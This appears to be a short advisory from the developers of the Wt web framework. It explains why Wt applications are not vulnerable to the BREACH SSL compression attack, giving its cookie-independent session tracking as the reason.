Security: Wt and the new BREACH vulnerability

Security: Wt and the new BREACH vulnerability

A new vulnerability, BREACH, was presented last week on Thursday at the Black Hat security conference in Las Vegas.

The vulnerability is significant since it severely breaks the effectiveness of SSL to secure a web application.

The paper provides more details, and shows how the attack can be used for example to decode the CSRF token used by web applications to protect against CSRF attacks. A CSRF attack itself is based on using cookies for session IDs (and the session implying an authenticated user). Since Wt never relies (solely) on cookies for session tracking, luckily, a Wt application is thus not vulnerable to BREACH, not in the context of CSRF or any other secret to be obtained from the web application.

Note that even if you configure session-tracking to Auto (which we do not recommend), in which case we do insert a cookie with the session ID, we never rely solely on this cookie for session identification in subsequent Ajax requests and require the session ID to be URL-encoded even then, mitigating any CSRF attack. The added value of the cookie is solely for a browser refresh to keep the session, but we do not interpret user data from such a page refresh.